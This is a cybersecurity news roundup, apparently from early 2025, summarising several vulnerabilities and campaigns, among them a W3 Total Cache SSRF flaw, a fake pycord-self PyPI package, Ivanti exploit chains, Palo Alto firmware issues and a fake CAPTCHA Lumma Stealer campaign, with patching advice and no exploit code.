Over a million WordPress websites are at risk due to a high-severity vulnerability in the popular W3 Total Cache plugin.

W3 Total Cache is used to boost website performance and improve search engine optimization.

The vulnerability (CVE-2024-12365 – CVSS score: 8.5) can allow attackers to gain unauthorized access to sensitive data and even launch attacks on internal systems. The flaw is due to a missing authorization check in the plugin’s code., which allows authenticated users with minimal privileges (Subscriber level and above) to perform actions they should not be able to.

Exploitation of CVE-2024-12365 could lead to:

• Server-Side Request Forgery (SSRF): Make web requests that could potentially expose sensitive data, including instance metadata on cloud-based apps.

• Information disclosure: Attackers can gain access to confidential data stored within the WordPress site.

• Service abuse: Consume cache service limits, which impact site performance and can generate increased costs.

The flaw affects websites running W3 Total Cache version 2.8.1 or earlier. Website owners using W3 Total Cache should update to the latest patched version (2.8.2) as soon as possible.

An Active Directory (AD) group policy designed to disable NTLMv1 has been found to be insufficient and could allow an attacker to use NTLMv1 authentication even when it is supposed to be disabled. Microsoft has for many years recommended to users that NTLMv1 should be disabled due to security risks posed by the dated protocol. As part of efforts by Microsoft to move users away from NTLMv1, it recommended AD users implement a group policy meant to disable the use of NTLMv1 and urged users to move to better alternatives such as Kerberos.

Recently, researchers have found that in certain circumstances, an attacker could potentially create a situation where NTLMv1 will be used even with the group policy in place if an application allows the use of NTLMv1 and an NTLMv1 message is received from a non-Windows client.

Microsoft was informed of the issue by the researchers but does not consider the issue as a vulnerability and intends to address it by way of its continuing efforts to remove NTLMv1 from its OSes. The researchers recommend that concerned organizations take precautions with a number of steps, including:

• Enabling audit logs for NTLM authentications on the domain

• Mapping applications that use NTLM or as a fallback

• Find vulnerable applications that require clients to use NTLMv1 messages

• Move to modern authentication methods

Hundreds of Python developers may have fallen victim to a fake Python package called “pycord-self”. The fake library was available on the official Python package index (PyPI) for several months since mid-2024, and was made up to be similar to a legitimate library called “discord.py-self”.

The fake library, which has amassed over 800 downloads, mimics the original legitimate library that offers developers a handy library of functions for managing interactions with Discord accounts and is frequently used for automating functions on Discord channels such as bots, moderation of content, and other tasks. However, if an unsuspecting developer downloads the malicious library instead of the legitimate one, they may find that they got more than they bargained for. Included within the malicious library is code that attempts to steal authentication tokens. It can also open a backdoor connection to a remote server on TCP port 6969, allowing the attacker to launch a remote shell to the compromised computer.

Developers are urged to carefully check libraries before use, even on official sources such as the PyPI package index, as attackers frequently target Python developers with fake libraries using package names similar to official libraries.

A flaw in ChatGPT’s web crawler could be exploited by an attacker to carry out a distributed denial-of-service (DDoS) attack on targets chosen by the attacker.

New research found that by simply sending a specially crafted HTTP POST request, without even needing any authentication, containing thousands of URls to the chatgpt[.]com/backend-api/attributions API endpoint, an attacker could cause the OpenAI backend to initiate thousands of simultaneous and repeated requests to the specified URLs, which could ultimately overwhelm resources at the targeted URLs. Victims at the receiving end of such a DDoS attack would see a large number of requests coming from ChatGPT via many different IP addresses and may find it difficult to mitigate the attack.

The researcher points to a failure to apply appropriate limits to the number of URLs that can be specified in the requests and a lack of authentication as contributory factors enabling such attacks. The issue has been communicated to OpenAI by the developer who is yet to receive a response.

Oracle’s January 2025 Critical Patch Update (CPU) sees the technology firm issue fixes for 318 vulnerabilities across its range of products and services.

One of the most severe vulnerabilities is a bug in the Oracle Agile Product Lifecycle Management (PLM) Framework. CVE-2025-21556 (CVSS score: 9.9) could allow an attacker to seize control of susceptible instances. The “easily exploitable vulnerability allows low privileged attackers with network access via HTTP to compromise Oracle Agile PLM Framework,” according to a description of the flaw in the NIST National Vulnerability Database (NVD).

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) on Wednesday (January 22) released technical details of exploit chains used by Chinese state-backed hackers to compromise Ivanti Cloud Service Appliances (CSA) in September 2024.

The agencies released indicators of compromise (IOCs) and other forensics data from cleanup operations and warned that four documented security flaws are providing an array of opportunities for threat actors linked to the Chinese government.

The vulnerabilities used in the attacks include:

• CVE-2024-8963, an administrative bypass vulnerability

• CVE-2024-9379, a SQL injection vulnerability

• CVE-2024-8190 and CVE-2024-9380, two remote code execution vulnerabilities

The threat actors used two main exploit chains and some lateral movement techniques to break into computer systems, perform remote code execution, harvest credentials, and implant web shells on victim networks. One exploit chain combined CVE-2024-8963, CVE-2024-8190, and CVE-2024-9380, while the other paired CVE-2024-8963 with CVE-2024-9379.

Daniel, a 15-year-old self-confessed schoolboy hacker recently discovered that Cloudflare’s CDN infrastructure can be potentially abused by those who may wish to spy on the movement of individuals. The hack can be used to track the general location of users with a 250-mile radius accuracy. This is possible because according to Daniel, Cloudflare’s CDN caches content such as images and videos at a data center site that is closest to the user making the requests for the content, in order to help improve website performance.

However, this targeted caching also ends up inadvertently revealing some information about the requester of the data. As the report by Daniel mentions, information returned in HTTP headers from Cloudflare may reveal information about the datacenters’ location and indirectly, the fact that the user is located within range of the serving data center.

To carry out an attack to locate a user, an attacker could target a privacy focused chat app such as Signal and send the user a unique attachment, such as an image, which would subsequently be cached by Cloudflare. Then, the attacker would use a custom tool called Cloudflare Teleport to force requests through various data centers to search for the cached image. By enumerating through the various data centers to find the cached image, the attacker could locate the user they wish to track.

Cloudflare for its part has indicated that the issues used to carry out these types of attacks have now been resolved. Daniel was also rewarded a $200 bug bounty for his troubles.

Last year, a security researcher known as Gjoko Krstic, who specializes in building management and access control systems, began to take a closer look at the offerings in this category from industrial giant ABB. During his investigation, he discovered that multiple products, such as ASPECT, MATRIX, and NEXUS, suffered from a large number of different vulnerabilities said to total over 1,000. Krstic shared details of the vulnerabilities with the company in 2024.

After several months, ABB finally published its advisory in January 2025 but with details of only 26 vulnerabilities (CVEs), covering a broad spectrum of vulnerability types such as remote code execution, SQL injection, file upload, credential exposure, denial of service, path traversal, cross-site scripting, etc.

In recent reports in the media, the disgruntled researcher responded to ABB’s efforts by claiming that the vendor silently patched many of the issues and that the number of vulnerabilities should have been far higher. In the ASPECT product alone, the researcher claims to have found over a thousand vulnerabilities, many of which would be considered critical or high severity. Another product called ABB Cylon FLXeon, which was not mentioned in the ABB advisory, is said to have at least 35 vulnerabilities.

The U.S. Cybersecurity Infrastructure and Security Agency (CISA) published its own ICS Advisory on the matter, providing advice to users on patches to install and mitigation measures to implement. Users of ABB products should check CISA’s and ABB’s advisories for details of impacted systems and steps to take.

Researchers who specialize in the analysis of security appliances shared information about what is being called a Pandora’s Box of vulnerabilities found in a number of Palo Alto’s network appliances.

To carry out the research, the researchers bought a number of Palo Alto appliances (models PA-3260, PA-1410, and PA-415). On detailed examination, the devices were found to be vulnerable to many different vulnerabilities, most of which are several years old. The newest issues found in the devices are an authentication bypass vulnerability in the management web interface CVE-2024-0012 (CVSS score: 9.8) and a privilege escalation vulnerability in the management web interface CVE-2024-9475 (CVSS score: 4.9), both of which were fixed in November 2024.

Some of the other attention-grabbing vulnerabilities found in the appliances include ones that could enable an attacker to tamper with the boot process of the appliance.

• The “BootHole” issue CVE-2020-10713 (CVSS score: 8.2) affects all the checked appliances and is a buffer overflow vulnerability that could allow for a secure boot bypass on Linux systems.

• Multiple CVEs affect the Insyde Software’s InsydeH2O UEFI firmware used by the PA-3260 appliance. These could allow for privilege escalation and secure boot bypass.

• The “LogoFail” is an old issue from 2023 that could be exploited by an attacker with a specially crafted boot logo image to enable them to execute code during the boot process.

The researchers communicated their findings to Palo Alto in November 2024 but due to an unsatisfactory response from the company, they decided to go public with the information, citing a need for users to be aware of the risks of using these products. Palo Alto for its part has stated that “the scenarios required for successful exploitation do not exist on up-to-date PAN-OS software under normal conditions with secured management interfaces deployed according to best practice guidelines.” The company said it will continue to work with third-party vendors on any mitigations, if necessary.

QNAP has patched six rsync vulnerabilities in its HBS 3 Hybrid Backup Sync software, which is used for data backup and disaster recovery on its network-attached storage (NAS) devices.

NAS and other internet-connected devices are frequently targeted by attackers so users of QNAP products that have HBS 3 Hybrid Backup Sync versions prior to 25.1.4.952 are urged to update immediately to mitigate the risk of attack.

Researchers have warned about a new malware campaign that uses fake CAPTCHA verification checks to distribute the Lumma information-stealing malware.

The attack is said to be targeting users in multiple countries with Argentina, Columbia, the U.S. and the Philippines most affected. The most frequently targeted industries include telecommunications, healthcare, banking, and marketing.

The attack chain for this campaign typically involves the user visiting a compromised website. There they are sent to a fake CAPTCHA page where they are instructed to copy and paste a command into the Windows command Run prompt in order to pass the challenge.

The command leads to the execution of a malicious script that downloads further stages of the attack chain, which ultimately results in the download and installation of the Lumma Stealer malware.

The Lumma Stealer malware is a popular malware-as-a-service (MaaS) option frequently chosen by many cybercriminals to carry out various campaigns. It was also recently seen being distributed in a campaign using fake domains impersonating Reddit and WeTransfer.